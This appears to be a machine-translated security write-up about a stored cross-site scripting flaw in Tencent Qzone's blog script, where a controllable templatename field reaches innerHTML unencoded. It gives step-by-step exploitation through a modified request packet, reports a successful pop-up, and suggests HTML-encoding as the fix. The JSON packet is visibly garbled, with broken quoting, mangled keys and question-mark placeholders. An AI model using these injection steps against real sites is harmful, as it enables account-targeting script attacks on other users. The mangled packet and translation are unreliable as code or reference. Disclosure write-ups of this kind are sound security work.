1. Then look at the code in that part of the first Vulnerability (CONTENT_GRIDSBLOG.JS) in this series.
In order to fix this loophole, Tencent adopted a more secure json.parse function as a repair scheme. There is no problem with this fix.
Other websites with similar flaws can refer to Tencent's repair plan.
2. In fact, there is another flaw, not far below this code, as shown in the following illustration:
As you can see, Ogridinfo is an [Object] parsed for json.parse.
And Ogridinfo.templatename took out, without any filtering, passed into the InnerHTML.
And from the capture data, the templatename in the JSON data is controllable, so there's obviously a problem here.
3. Modify the templatename in the log packet and send it.
{"G0": {"visible": 1, "id": 0, "content": {"Mood": "", "image": "," date ":", "Text": "1"}, "type": 1, "title": "?????????"} , "G5": {"visible": 1, "id": 5, "content": {"Mood": "", "image": "", "Date": "", "Text": "1"}, "type": 1, "title": "?????????"} , "G1": {"visible": 1, "id": 1, "content": {"Mood": "", "image": "," date ":", "Text": "1"}, "type": 1, "title": "???????"}, " TemplateName ":"
"," G4 ": {" visible ": 1," id ": 4," content ": {" Mood ":" "," image ":" "," date ":" 2013-03-20&1 "," text " : ""}, "type": 0, "title": "???? 2013-3-20 "}," G7 ": {" visible ": 1," id ": 7," content ": {" Mood ":" "," image ":", "date": "," Text ":" 1 "}," type ": 1," title ":"?????????? "} , "version": "1.2", "G2 ': {" visible ": 1," id ": 2," content ": {" Mood ":" "," image ":" "," Date ":" "," Text ":" 1 "}," type ": 1," Title ":"?????? "}," Bgitem ": {" Bgid ":" 130 "," Bgurl ":"/qzone/newblog/v5/flashassets/bg130.swf?bgver=1.0&max_age =31104000 "," Gridcolor ":" 0xf06368 "," Alpha ": 1," align ":" Right "," Wordcolor ":" 0xFFFFFF "}," Tempid ":", "G8": "Visible ": 1," id ": 8," content ": {" Mood ":" "," image ":" "," Date ":" "," Text ":" 1 "}," type ": 1," title":"??????????? "}," G6 ': {"visible": 1, "id": 6, "content": {"Mood": "", "image": "", "Date": "", "Text": "1"}, "type": 1, " Title ":"???????????? "}," G3 ': {"visible": 1, "id": 3, "content": {"Mood": "", "image": "", "Date": "", "Text": "1"}, "type": 1 , "title": "?????????"}}
4. Use a different number to view the published log. Successful pop-up.
Because the code logically, only others to view the log, will trigger this code, so when testing, please see the log containing the defect code as a third party
Repair scheme:
After ogridinfo.templatename out, HTMLEncode.